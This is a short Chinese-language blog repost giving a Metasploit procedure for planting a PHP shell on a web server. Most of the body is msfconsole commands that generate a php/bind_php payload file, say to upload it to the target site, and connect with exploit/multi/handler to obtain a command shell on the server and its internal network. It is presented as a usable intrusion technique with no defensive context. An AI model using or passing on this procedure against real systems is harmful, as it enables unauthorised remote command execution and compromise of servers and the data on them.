码迷,mamicode.com
首页 > Web开发 > 详细

php结合msf反弹内网shell

时间:2017-07-17 01:27:35      阅读:389      评论:0      收藏:0      [点我收藏+]

标签:xpl   sha   就会   use   php   分享   修改   运行   外网   

感谢:

perl6大佬分享的姿势。

MSF:

msf > use payload/php/bind_php
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目标内网ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改一下,没有php标签就加个php标签之类的。

然后将xishaonian.php传到web上。
然后再次运行msf

use payload/php/bind_php
msf payload(bind_php) > set RHOST 目标外网ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run

访问web上的xishaonian.php,就可以反弹到cmdshell了。

php结合msf反弹内网shell

标签:xpl   sha   就会   use   php   分享   修改   运行   外网   

原文地址:http://www.cnblogs.com/xishaonian/p/7192497.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!